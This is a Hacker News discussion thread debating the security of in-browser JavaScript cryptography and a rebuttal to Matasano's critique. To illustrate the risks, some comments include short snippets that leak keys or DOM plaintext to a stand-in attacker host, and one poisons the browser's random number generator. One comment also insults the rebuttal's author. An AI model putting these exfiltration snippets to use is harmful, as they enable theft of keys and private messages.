Thoughts on Matasano Security’s Critique of Javascript Cryptography (nadim.cc)
52 points by dmix on May 25, 2013 | 56 comments



> “JavaScript lacks a secure random number generator.”

> This is in fact not the case. window.crypto.getRandomValues() is a secure random number generator available in JavaScript, and supported by major web browsers

That url points to a page that has a big green warning.

"This is an experimental technology Because this technology's specification has not stabilized, check the compatibility table for the proper prefixes to use in various browsers. Also note that the syntax and behavior of an experimental technology is subject to change in future versions of browsers as the spec changes."

Note that having a PRNG available doesn't mean it's being used properly. (See Debian and OpenSSL)
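
To be fair, the call itself is simple; a minimal sketch, assuming a browser that exposes the unprefixed API:

    // Fill a typed array with cryptographically strong random bytes.
    var bytes = new Uint8Array(16);
    window.crypto.getRandomValues(bytes); // fills the buffer in place
    // bytes now holds 16 CSPRNG-generated octets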


In the footer it also says that neither IE nor Opera support the feature, and Firefox only added it in version 21, which was released less than two weeks ago.


This post is technically correct in that Javascript could be used as the implementation language for a cryptography implementation distributed as a signed browser plugin[1]. However, that's really not the point - if you're going to have to distribute a browser extension/plugin anyway you could equally well use ActiveX (as is used for successful crypto implementations in East Asia) or the netscape plugin API and use whatever implementation language you like. The original critique was really talking about "Javascript cryptography" in the sense of "in-browser cryptography using javascript loaded the normal way browsers load it", which is and remains fundamentally broken.

[1] Although even then there are issues - e.g. with an interpreted/JITed language like javascript it becomes very hard to avoid timing attacks.
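
A minimal sketch of the classic example; nothing here is crypto-specific:

    // Naive byte-array comparison: it returns early at the first mismatch,
    // so response time reveals how many leading bytes were correct.
    function unsafeEqual(a, b) {
      if (a.length !== b.length) return false;
      for (var i = 0; i < a.length; i++) {
        if (a[i] !== b[i]) return false; // early exit = timing side channel
      }
      return true;
    }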


Although we wrote this article informally in 2011, we stand behind it in 2013. I'd also add, in case Nadim was wondering who reads info@matasano.com, that I'm a Matasano founder and not an employee.

Don't build cryptographic features using browser Javascript.


I can't wait until they get the flaws in JavaScript crypto ironed out so my "pure" Excel AES implementation can reign supreme as the worst implementation of a cryptographic primitive ever.


That's not going to happen: I endorse your Excel AES implementation immediately. If a pure spreadsheet AES works for your project, go ahead and use it!


> This is in fact not the case. window.crypto.getRandomValues() is a secure random number generator available in JavaScript, and supported by major web browsers.

Ironically, the page he's linking to mentions that the function is an experimental technology and that the specification has yet to stabilize.


Feynman's Cargo Cult Science talk is relevant here. (http://www.lhup.edu/~DSIMANEK/cargocul.htm)

> But there is one feature I notice that is generally missing in cargo cult science. That is the idea that we all hope you have learned in studying science in school--we never explicitly say what this is, but just hope that you catch on by all the examples of scientific investigation. It is interesting, therefore, to bring it out now and speak of it explicitly. It's a kind of scientific integrity, a principle of scientific thought that corresponds to a kind of utter honesty--a kind of leaning over backwards. For example, if you're doing an experiment, you should report everything that you think might make it invalid--not only what you think is right about it: other causes that could possibly explain your results; and things you thought of that you've eliminated by some other experiment, and how they worked--to make sure the other fellow can tell they have been eliminated.

> Details that could throw doubt on your interpretation must be given, if you know them. You must do the best you can--if you know anything at all wrong, or possibly wrong--to explain it. If you make a theory, for example, and advertise it, or put it out, then you must also put down all the facts that disagree with it, as well as those that agree with it. There is also a more subtle problem. When you have put a lot of ideas together to make an elaborate theory, you want to make sure, when explaining what it fits, that those things it fits are not just the things that gave you the idea for the theory; but that the finished theory makes something else come out right, in addition.

It's the same for crypto. This is where all the "don't roll your own" stuff comes from. Use stuff that other people have built, and other people have poked at.

Many people say that Javascript crypto is a bad idea. Considering that people use cryptography to avoid being shot in the head by their oppressive governments, it seems irresponsible to dismiss any concerns about Javascript crypto without rigorous testing.


The worst problem nowadays is how to make sure that your HTTPS connection is not MITMed.

For most low to medium risk profiles HTTPS is safe enough. However, in these cases in-browser encryption is rarely needed. For the threat model that applications like Cryptocat face, the danger of a targeted attack by someone with access to the CA infrastructure is not negligible.

So if you can trust the server with your data, you don't need JS cryptography. If you can't trust the server, how can you trust the JS it sends?


> If you can't trust the server, how can you trust the JS it sends?

This is the fundamental issue here. The trust model is purely, irrevocably broken. This isn't something you can paper over.


> So if you can trust the server with your data, you don't need JS cryptography. If you can't trust the server, how can you trust the JS it sends?

He addresses that by using Chrome plugins and code verifiers. Not the ideal or most convenient solution, obviously.

But you also can't assume the JS is hosted and delivered by the same server the data is being transmitted through. JS is extremely portable.


> He addresses that by using plugins and verifiers. Not the ideal solution, obviously.

As noted in the second point of my response in the root of the thread, this isn't just a non-ideal solution, it's a non-solution. It doesn't solve the trust boundary issues inherent here.


Aren't those trust boundary issues also present in every other piece of downloadable software, such as Tor for example? When you download a signed plugin, what's the difference from downloading Tor?


In theory, yes. There's nothing inherently more secure about Tor than an app running in the browser. However, XSS attacks are everywhere, it's trivial for servers to shoot code down to the client to evaluate, etc. In practice, an app doing crypto on your desktop is fundamentally very different from a web app doing it, even if that's signed and isolated.


Okay. But XSS is a class of bugs that has nothing to do with code delivery, and that is quite possible to mitigate. So overall, the problem of code delivery is still addressed to a notable (if not complete) extent with the use of downloadable signed browser apps.


Huh? Maybe I misunderstand what you're going on about, but if you can XSS in javascript, you can certainly change the meaning of even signed code - just hijack Object.prototype.constructor or similar.
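
A sketch of what that hijack can look like, assuming the injected script runs before the signed code does:

    // Poison a primitive the "trusted" code relies on.
    var real = window.crypto.getRandomValues.bind(window.crypto);
    window.crypto.getRandomValues = function (buf) {
      real(buf);
      for (var i = 0; i < buf.length; i++) buf[i] = 0; // silently strip the entropy
      return buf;
    };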


That may very well be the case, but isn't this a solvable problem? Just like apps made in C need to be protected against buffer overflows, apps made in JS need to be protected against XSS. Both are reasonable threats that can be mitigated.


Consider the case where some other part of the application that the reviewed crypto plugin JS is part of has an XSS in it.

Yes, but just because it can be mitigated doesn't mean that it is mitigated.


> Yes, but just because it can be mitigated doesn't mean that it is mitigated.

Sure, but I just want to point to the fact that this is a solvable problem. A lot of people talk as if it is some sort of insurmountable obstacle, whereas I think responsible programmers can solve it and move on.


You're arguing for a theoretical world; we're arguing from a practical one. I've spent enough time down in the trenches finding attacks in extremely well-reviewed code that adding a massive new attack surface is not a thrilling proposition.


Well, I guess you're just slightly more pessimistic and I'm slightly more optimistic. I respect your viewpoint, though. :-)


I'm a really optimistic type, really. Optimistic to the annoyance of some people. But in the case of security and cryptography there is no choice between optimism and pessimism, only a choice between sharp-eyed paranoia and wilful ignorance.

A defence is always only as strong as the weakest link, and an attacker usually has all the time in the world to find and exploit it.

Optimism has no place here.


The smiley face in that comment is doing a lot of work.


In the context of the GP (attack by someone with access to the CA infrastructure) you can't trust "signed" plugins either.


i could bother to read what nadim has written, but then i would fall in the "successfully trolled" bucket. i consider daeken very kind for reading and systematically disassembling nadim's post. instead, i will make a few rude blanket statements.

- having a misleading wired article (or several) written about you in no way qualifies you as an expert on cryptography. anyone who has any level of knowledge in the subject knows this guy is a total hack.

- everything that is somewhat correct about his products is due to people who _actually_ know stuff about cryptography telling him "no, no, no, you need to do X". the entirety of the architecture is effectively crowd-sourced. people telling you how to be a good carpenter is no substitute for being a skilled woodworker.

- nadim should stop making crypto products because bad crypto _puts people at risk_. if you make one bad product, i can see chalking it up to "well, at least he's trying". instead, nadim has routinely and repeatedly demonstrated his lack of real domain knowledge.

i suggest nadim make some turd-like web 2.0/3.0 driven product where security doesn't matter. he clearly has the tenacity to code but lacks the intelligence and domain knowledge to make security-related software.


It seems to me that a fundamental problem in all software security systems is that you cannot necessarily trust the location where the software is deployed. Javascript has these issues, but I think it's a mistake to claim that anything beyond the specific instances of those issues is unique to Javascript.

If you do not know if your system is already compromised, you cannot guarantee that using your system is without risk. And that's even before we get to people willing to break down doors and other such nastiness.

That said, these are not "crypto flaws" - these are flaws that exist in systems even if the math of the cryptography is perfect.

That said, there's something to be said for interacting with other people. And focusing on security risks while ignoring denial of access risks seems silly.

Anyways, my reading of the people writing here suggests to me that almost no one here is really serious about security. There's too much focus on trash talk, and on struggling to properly characterize a now-nonexistent version of a blog page, and not enough focus on useful security mechanisms for me to have learned anything useful.

One thing to keep in mind, though: everything that happens on the internet has visibility. So if some code is advertised as stable and it changes from day to day? Something is wrong. Similarly if I download the same code from two different machines and I get something different for supposedly stable code, something is wrong...

And, one of the nice things about open source browsers is that - hypothetically at least - anyone can take the browser and build it for themselves, with their own monitoring and tracking code. This can take time, and modern browsers seem to be updated almost as fast as they can be built, but they do seem to have internal APIs which are rather stable. (Other approaches are also possible - what I am describing here is an off-the-cuff variant tailored to some of the risks raised in other posts on the page where I am responding...)

Grey boxes and human readable documentation for the win...


So, first it should be noted that this critique (and the original article) are from 2011. Not a lot has changed since then, but it's worth noting. Secondly, I'm an ex-Matasano employee and still friends with tptacek et al; just throwing my potential biases out on the table.

Now, I don't agree with every single bit of the original article, but I disagree with just about every bit of this one. I'll go point by point.

>> “Any attacker who could swipe an unencrypted secret can, with almost total certainty, intercept and alter a web request.”

> This problem is simply mitigated by deploying Javascript cryptography in conjunction with HTTPS.

No, it's really not mitigated by doing so. Because the crypto code is coming from the server you're attempting to prevent cleartext access to, the trust model is fundamentally broken here. The server could easily throw down JS code that does not perform proper crypto operations, leaks keys, or any number of other things. And that's not even speaking of XSS and other attacks making it trivial for an attacker to compromise your data.
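
A sketch of how little that takes; realEncrypt and the endpoint are made-up names, and the key is assumed to be a string:

    // What a compromised or compelled server could serve instead of the real code.
    function encrypt(key, plaintext) {
      new Image().src = 'https://attacker.example/?k=' + encodeURIComponent(key); // leak the key
      return realEncrypt(key, plaintext); // still behaves correctly for the user
    }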

Edit (based on edited OP): > [...] it is possible to deliver web apps as signed, local browser plugins, applications and extensions. This greatly helps with solving the problem.

Correct, this does mitigate some of the issue. Namely, it allows the code to be reviewed as it is in use. However, the server can still push code arbitrarily and completely compromise the crypto, and XSS is still an issue.

>> “Secure delivery of Javascript to browsers is a chicken-egg problem.”

> This problem, while serious, can be mitigated with the usage of browser plugins that locally verify the integrity of the Javascript code, warning the user should the code be faulty.

This is correct...ish. The problem is that it still gives too much trust to the server. The proper approach would be a browser plugin that exposes a Keyczar-style, high-level interface to JS crypto and allows secure operations on data without revealing access to the server.

However, this still isn't enough. Take the case of Gmail adding GPG support for emails. Let's assume you have a perfectly secure plugin such as one I described above. Even in this case, the server-driven JS still could send unencrypted data from the DOM up to the server, before crypto operations have happened. The trust boundaries are nonexistent here.
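
A sketch of that scrape; the element id and endpoint are hypothetical:

    // Any script on the page can read the plaintext before the plugin encrypts it.
    var draft = document.getElementById('compose-body').value;
    new Image().src = 'https://attacker.example/log?d=' + encodeURIComponent(draft);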

>> “Javascript lacks a secure random number generator.”

> While Javascript does not ship with a secure random number generator, [...]

Let's just stop here. Doing a CSPRNG right is hard. Very, very hard. Thankfully, browsers are starting to implement this as part of the browser directly, making it much less likely that JS code can skew results. This should be a solved problem soon, if it isn't already.

Edit (based on edited OP): They now mention the CSPRNG built into modern browsers. As mentioned, this is 99% a solved problem.

>> “Javascript cryptography hasn’t implemented well-known standards such as PGP; such a high-level language can’t be trusted with cryptography.”

This is one point from the original article that I think is specious. If you have the proper lego blocks, you should be able to put together things like PGP securely. But those blocks don't exist.

> However, the ultimate problem with browser cryptography is that there is no standard for innate, in-browser encryption. Very much like HTML5 and CSS, there needs to be an international, vetted, audited, cross-browser standard for browsers to be capable of securely encrypting and communicating sensitive information. There's no denying the urgent need for such a standard, considering the ridiculous rate at which the browser is becoming pretty much the mainstream central command for personal information.

This I agree with. However, every approach so far has really, really, really sucked. See also: https://news.ycombinator.com/item?id=4549504

To do this properly, we need a standard for high-level crypto operations, which is incredibly hard to pull off, and we need sane trust boundaries to prevent the server from skewing operations and stealing data. I hope someone will get it right eventually.

Edit: Forgot to respond to one point.

>> “JavaScript’s ‘view-source transparency’ is illusory.”

> It is the case in every cryptography implementation that the implementation will need to be reviewed by an expert before being declared secure. This is no different in JavaScript, C, or Python.

There are a few issues here:

1) Generally speaking, the fact that JS source is pushed down on every access means that there's no way for you to actually review it.

2) Even if the crypto code is isolated and completely reviewed and found to be bulletproof, the trust boundaries are still screwed. C.f. the Gmail example above.


>The server could easily throw down JS code that does not perform proper crypto operations, leaks keys, or any number of other things.

(Not legal advice; consult an attorney before following anything in this post.)

There is an important difference between "server could send malicious javascript" and "server does send malicious javascript". This difference becomes important when you consider the legal definition of the word "possession" - a service provider can be compelled (e.g. by a discovery request) to disclose information that he has in his possession, but he cannot be compelled to disclose information that he does not have. Information encrypted in-browser before the data is sent to the server is legally never in the possession of the service provider, whereas information that is sent to the server to be encrypted is legally in his possession for that brief moment, and is therefore subject to being disclosed.

In an imaginary black-and-white world, only the CIA types with the torture tools and secret jails come after the data, and they can compel the service provider to send malicious javascript to harvest the secret if they want to. In the real shades-of-gray world there are tons of people who want to get access to someone else's data and who have to abide by the law to do it.


I'm not so sure about that. See for example hushmail in 2007: http://www.wired.com/threatlevel/2007/11/encrypted-e-mai/

While with this specific case here they intercepted the passphrase server-side, they specifically hinted that it wouldn't have made a difference with their java applet.

"The extra security given by the Java applet is not particularly relevant, in the practical sense, if an individual account is targeted"


Reading the paragraph preceding the phrase you quoted, the context implies to me that they are discussing whether the architecture prevents hushmail from bugging the java applet (it does not). They do not talk about whether they can be legally compelled to do so.


In the vast majority of cases, governments are not your adversary, or are very far down the list of priorities. They may have to follow the law, but the majority of other adversaries don't; that's why we are concerned about XSS, buffer overflows, and all other attacks against implementation flaws.

That said: yes, bad crypto will defend against government 'attacks' as well as good crypto will, if you assume they're going to play by your rules. But it's still better to do it the right way.


I don't think you understood my post at all.

My point is that adding in-browser crypto to a web app (https-only site, no external resources loaded, yada yada) has a substantial impact on whether the information is disclosed or not in the end, in particular when we are talking about legally compelled disclosure.

Do you agree or not?


I agree only in the case of a legally-compelled disclosure. For all other cases, there are a million simple means by which you can break it.


> Correct, this does mitigate some of the issue. Namely, it allows the code to be reviewed as it is in use. However, the server can still push code arbitrarily and completely compromise the crypto, and XSS is still an issue.

You're wrong. If a JavaScript app is structured properly, especially one delivered as a signed browser plugin, it can run completely client-side with no capability to _execute_ remote JavaScript code from a server whatsoever.

Simply making and parsing XMLHttpRequests does not mean that the JS app is executing arbitrary code from a remote server. It may simply be parsing JSON payloads. This is completely up to whatever code is delivered as part of the browser add-on, and cannot be remotely overridden by the server.
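
The distinction, as a sketch (xhr is assumed to be a completed XMLHttpRequest):

    // Data-only handling of a server response: parsed, never executed.
    var payload = JSON.parse(xhr.responseText);
    // versus the anti-pattern that hands the server an execution path:
    // eval(xhr.responseText);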

You are correct that XSS is an issue, but as mentioned elsewhere, so are buffer overflow attacks in compiled code. Any crypto implementation will have "issues" that need to be engineered around. That's the purpose of independent review and open source code.

The original claim by the Matasano article was that JS crypto is "doomed," which I believe is patently false linkbait. While no one would agree that JS crypto is "ideal," I believe Nadim has raised very good arguments to say that, at the very least, it can be done properly.


We have better ways of baiting links than telling generalist software developers things they don't want to hear about cryptography.

http://www.matasano.com/articles/crypto-challenges/


May your SEO be blessed.


We have mesothelioma and car insurance meta tags, but they're encrypted in such a way that you can only see them if you finish all 48 challenges. Why not sign up and see how you do?


Done. This should be fun :)


First set should be in your inbox. Good luck! It starts out simple.


In a perfect world, you're absolutely right. In practice, you couldn't be more wrong.

> You're wrong. If a JavaScript app is structured properly, especially one delivered as a signed browser plugin, it can run completely client-side with no capability to _execute_ remote JavaScript code from a server whatsoever.

It is absolutely possible to engineer an application in that way, but that is not how the vast, vast, vast majority of applications work. Most of them throw data straight into the DOM, they include scripts from the server, etc, etc. It's possible to do this right, but I rarely see it.

> You are correct that XSS is an issue, but as mentioned elsewhere, so are buffer overflow attacks in compiled code. Any crypto implementation will have "issues" that need to be engineered around. That's the purpose of independent review and open source code.

XSS is easy to find, easy to exploit, and exists everywhere in real-world web apps. This is comparing the danger of a car heading towards you at 200mph to a baby coming towards you in a stroller. They're just worlds apart.

At the end of the day, nearly every single web application I've tested (hundreds, if not thousands) has fallen to the same issues. This trend hasn't changed, and I don't expect it to do so any time soon.


Matasano's claim is that JavaScript is fundamentally "doomed" for crypto. You are saying that it is possible to engineer a JS crypto app properly, but almost nobody does.

There's a big difference between a technology being fundamentally broken and engineers simply not using it correctly.

This same sort of problem applied to PHP years ago. The default behavior of the language made it easy to write horribly insecure code, and many developers did. But it has always been possible to engineer a PHP app in a secure manner. You just had to work a bit harder at it in the past.

You are absolutely correct that most people don't write secure JS code today. But the web is an evolving platform, and as standards and engineering awareness improve, this will change.

The need for better in-browser crypto standards is clear. In spite of this, Nadim has proved that it is possible to build secure JS apps today. It is specious to simply dismiss his contributions because most other engineers don't write secure code.


I agree with you that JavaScript crypto is dubious in many applications, but as a note, I believe that HTML/JavaScript makes a good cross-platform application platform that, due to the lack of difficult-to-reproduce compile steps, has the potential to provide increased security over traditional applications. In particular, it should be possible for something like a Chrome application to refuse to update until it has received signatures on the source code itself from multiple trusted sources who have supposedly reviewed the code, which, while not perfect of course, is better than the usual model for native applications. That's one of a few reasons that the Web Crypto standard should be encouraged, IMO.
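
A sketch of that gating logic; sha256, verifySig, and the signature format are hypothetical stand-ins, not a real extension API:

    // Accept an update only if enough independent reviewers signed its digest.
    function shouldUpdate(newSource, reviewerSigs, verifySig) {
      var digest = sha256(newSource); // hypothetical hash helper
      var approvals = reviewerSigs.filter(function (s) {
        return verifySig(s.pubkey, digest, s.sig); // hypothetical verifier
      });
      return approvals.length >= 2; // require multiple reviewers
    }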


Although I think the API itself has a severely misguided design, the concept underlying the Web Crypto standard is a good one, and I agree it's worth encouraging.

Of course, the post we wrote in 2011, years before Web Crypto, agrees with you too.


> Generally speaking, the fact that JS source is pushed down on every access means that there's no way for you to actually review it.

The blog post says that it is necessary for code to be loaded as a local, signed browser plugin. That means JS source is not pushed down on every access.

> Even in this case, the server-driven JS still could send unencrypted data from the DOM up to the server, before crypto operations have happened. The trust boundaries are nonexistent here.

Why? A well-programmed JS app could simply tightly control all data received from the server and prevent insecure data parsing. It's totally possible; why isn't it considered?


> The blog post says that it is necessary for code to be loaded as a local, signed browser plugin. This does not make JS source pushed down on every access.

When this response was written, the blog post said nothing of the sort. In fact, in that point the text has not been changed whatsoever.

> Why? A well-programmed JS app could simply tightly control all data received from the server and prevent insecure data parsing. It's totally possible, why isn't it considered?

I'm speaking of an adversarial environment where the server is seen as an untrusted peer (hence the need for client-side crypto above SSL). The reason it's not considered is simple: servers get owned, services change their minds on issues, and people screw up. While it is theoretically possible to accomplish secure client-side crypto given enough constraints, this does not map well to reality.


> When this response was written, the blog post said nothing of the sort. In fact, in that point the text has not been changed whatsoever.

Allow me to quote from the blog post: "In fact, I believe that it is necessary to deliver JavaScript cryptography-using webapps as signed browser extensions, as any other method of delivery is too vulnerable to man-in-the-middle attacks to be considered secure."

> While it is theoretically possible to accomplish secure client-side crypto given enough constraints, this does not map well to reality.

Well, in my case, we got our browser plugin audited by Veracode and things worked out.


> Allow me to quote from the blog post

As I said, that point (the one you quoted me on originally) does not make mention of signing, and the quote you gave there did not exist when I wrote the comment, as you well know. This is silliness of the highest order.

> Well, in my case, we got our browser plugin audited by Veracode and things worked out.

"Things work out" until they don't. As a fellow security professional, you should know as well as I do: no matter how many audits you do, you're still fucking something up, and someone will find it if it's valuable enough to do so. This is as true of your code as it is mine or anyone else's.


The blog post was updated to reflect post-2011 reality right before you posted this comment. You should give it a re-read.


The only change seems to be a reference to the W3C Web Cryptography Working Group. Which is a bit funny, since that's who pushed the draft referenced in the HN thread I linked (the one I said was horribly broken).

Edit: Magikarp is correct, there are several other changes. I'll annotate my post as needed. Done.


There are actually other changes. I recommend you re-read the post.

Edit: Thank you for re-reading! :-)


Is there any chance you'd be willing to throw up the original post somewhere? It'd be nice to have alongside my points for comparison purposes, just because it's changed so much. If not, that's cool.


I don't think I have it anymore. I didn't save a copy.


Well, the wayback machine is your friend. http://web.archive.org/web/20111001124736/http://log.nadim.c...


Seems pretty straightforward: If you trust the server, then HTTPS is sufficient. If you don't trust the server, then you shouldn't be doing anything sensitive in the browser. If you ever see the decrypted data, then obviously it's there in plain text on the page, and the server can just snap it out with one line of jQuery.
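
Roughly (selector and endpoint hypothetical):

    // the one line:
    $.post('/collect', { secret: $('#decrypted-output').text() });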


Without going into the technical details described by other commenters here, this is my understanding of the problem (please correct me if I'm wrong): you receive the code that is run from the same entity you should be protecting yourself from -- that being the Cryptocat server. This is a big contradiction.

One really should assume that if a service can be compelled to act against the interests of its users, that will eventually happen.


Some people are happy letting their ego be in the driver's seat, and they do pay a price for it.



